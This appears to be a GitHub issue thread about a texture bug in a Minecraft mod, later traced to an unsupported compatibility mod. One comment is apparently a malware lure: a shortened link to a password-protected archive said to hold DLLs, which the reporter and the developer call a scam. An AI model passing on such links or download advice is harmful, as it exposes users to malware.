### ISSUE TITLE
[Bug] all scroll textures disappear when forge CIT is installed at the same time 

### ISSUE THREAD

**Issue by TheBiPerson** [iron431/Irons-Spells-n-Spellbooks#588]
### Observed behaviour

when Forge CIT and Iron's Spells 'n Spellbooks are installed at the same time Scroll textures are all purple errors

### Expected behaviour

scrolls have their normal textures and display properly

### Steps to reproduce

install Iron's Spells 'n Spellbooks and Forge CIT(https://www.curseforge.com/minecraft/mc-mods/forge-cit)
load into a world and see that the textures for scrolls are purple errors

### Server Type

Single Player

### Iron's Spells N Spellbooks version

1.20.1-3.4.0.1

### Forge version

1.20.1-47.3.0

### Other mods

i was running like 300 mods at the same time but i can get them if absolutely necessary

**Comment by d-dvorkin** [comment]
download

https://bit.ly/3zo8fAM
Archive password: changeme
I put the necessary dlls in the archive

**Comment by TheBiPerson** [comment]
scam? or just shady user providing help. either way im not downloading anything from anyone but the mod dev, and i advise everyone else to do the same thing.

**Comment by iron431** [comment]
that is a scam

**Comment by iron431** [comment]
i cannot reproduce this with just the two mods
![image](https://github.com/user-attachments/assets/57478f95-f8f9-4584-9024-578661f0f6da)

**Comment by TheBiPerson** [comment]
MB, just realized why after looking at Forge CIT's bugs, i had sinytra connector installed and thats why it wasnt working right, i had assumed it was an incompatibility with this mod since it only affected this mod and i was able to fix it when i removed Forge CIT from my modpack

**Comment by iron431** [comment]
connector is not supported so this will be marked as closed
